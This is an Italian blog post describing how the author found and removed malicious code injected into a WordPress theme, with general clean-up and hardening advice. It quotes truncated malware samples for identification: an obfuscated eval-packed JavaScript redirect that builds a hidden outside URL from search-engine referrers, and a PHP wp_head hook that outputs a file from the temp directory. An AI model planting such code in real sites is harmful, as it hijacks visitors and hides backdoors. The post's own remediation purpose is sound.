Avete mai subito un attacco sul vostro Blog? Un attacco con iniezione di codice JS o altro che vi rende la vita difficile?
Oggi è toccato a me, mi sono beccato un simpatico JSRedirect … dato “enter” sul link di uno dei miei Blog ed ecco la “sorpresa”. Per precauzione faccio una contro verifica da altro comuper e ne ho la conferma … anche AVAST segnala lo stato di PERICOLO.
Noioso e a volte pure difficile individuare la fonte del disagio così da eliminarlo, ma armato di pazienza inizio step by step a verificare il Blog, i suoi file, temi e altro a corredo.
In linea generale i siti fatti con WordPress soffrono di una debolezza intrinseca data dai suoi innumerevoli plugin e temi che se non progettati al meglio lasciano degli spiragli e buchi ai potenziali e pericolosi attacchi. Di norma suggerisco vivamente di scaricare qualsiasi addon e plugin per WordPress dalle sole fonti ufficiali come www.wordpress.org così da limitare eventuali problemi.
Oltre ad una cattiva “progettazione” del plugin o del tema, faccio notare che proprio al fatto che siano GRATUITI “troppo bello per essere vero”, molte volte vengono creati con l’intento di far scaricare lo stesso per poi sfruttarne la console come mezzo di distribuzione per pubblicità o peggio malware.
Conclusione: con ogni probabilità è stato un plugin o tema ultimamente installato che ha aperto un varco nel mio Blog ed ora al lavoro ….
Cosa posso fare?
- In primo luogo una ricerca su internet per verificare se altri hanno avuto lo stesso problema e come lo hanno risolto. Di norma questa ricerca da ottimi risultati su siti in lingua inglese.
- Successivamente una prima verifica dello stato del sito grazie ad alcuni tools online che ne permettono di individuare eventuali problemi di sicurezza e tra i tanti io oggi utilizzo i seguenti:
Questi siti sono utili per analizzare e identificare eventuale codice nascosto all’interno dei file del vostro WordPress, in particolare dei plugin e temi installati.
Tra le prime cose da fare, suggerisco quella di cambiare le vostre password e quelle di tutti gli utenti oltre a quella del data base.
Modificare le chiavi segrete di WordPress presenti nel file wp-config.php, creandone di nuove grazie a questo link
Controllare il file Htaccess spesso utilizzato dagli Hacker per apportare modifiche. Scorrete e verificate che tutto sia come deve, quindi applicate permessi 644 al file così da evitare modifiche future.
Sostituire i file “core” di WordPress con una vecchia copia di backup funzionante.
Ora vediamo nel dettaglio un esempio tipico di cosa dobbiamo cercare e fare. Una delle soluzioni che ho trovato è quella di ricercare del codice specifico “malware” che si cela all’interno di wp-config.php o wp-settings.php alla fine del file, di solito, si trova un codice simile al seguente:
script> eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){returnd[e]}];e=function(){ ...Una volta identificato, sarebbe sufficiente eliminare il codice in questione.
Sempre nel vostro file wp-settings.php, una ulteriore variante potrebbe essere la seguente:
functioncheck_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');}}
add_action('wp_head', 'check_wordpress');
do_action( 'init' );Ma nel mio caso nessuna di queste soluzione mi ha liberto dal problema.
Nel mio caso l’attacco è stato “iniettato” nel file function.php del tema, ed ecco un esempio di codice identificato nel mio tema:
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('er=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))BC=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"hp\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+rn(q+2+t.6).o(\"&\")[0];',39,0,'||| indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query| |er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|s nipped ...Perché i miei tentativi di individuare il problema sono falliti nonostante ho letto più post sui diversi Blog per la sicurezza?
Semplicemente perché gli hacker sono “saggi” e di norma quando riportano informazioni queste sono parzialmente vere o con indicazioni fasulle così poi da attivarsi successivamente in una modalità differente per da rendere la vita difficile a noi utenti oltre al fatto che attaccare un tema con molti file rende le cose ancor più complicate.
Sostanzialmente un metodo valido (io ritengo) per individuare un potenziale problema è quello di aver installato AVAST ultima versione o utilizzare lo strumento webmaster di Google che segnala eventuali anomalie.
Una volta appurato che siete stati attaccati, con tanta pazienza, dovete analizzare il codice del vostro sito e rintracciare la fonte del problema nei singoli file. I Blog sulla sicurezza sono sicuramente utili, ma non sempre vi offrono una soluzione “bella e fatta” diciamo, come nel mio caso, vi possono indirizzare su come e cosa crea il problema.
Suggerisco di scaricare in locale il vostro sito tramite FTP (le immagini non servono così da velocizzare il tutto), fate attenzione di scaricare sicuramente anche i plugin e temi utilizzati e iniziate a ricercare nei singoli file il codice sospetto.
Una volta scaricato, fate analizzare tutti i file dall’antivirus nella speranza di rintracciare il file sospetto.
Ricordate che difficilmente il codice “malware” viene incluso nei file di WordPress, ma più facilmente nei plugin e temi che risultano più semplici da attaccare.
Una volta individuato il file che crea problemi, rimuovete il codice NOCIVO inserito e per far questo potete confrontare i due file, quello contagiato con quello originale se avete il tema originale per esempio, oppure ricercare il codice sopra riportato o similare.
Vi ricordo che aver eliminato il problema “codice” non significa aver risolto i vostri problemi di sicurezza, anzi forse non avete nessun strumento di prevenzione sul vostro Blog online e in questo caso vi suggerisco i seguenti plugin: Wordfence o All in One Security.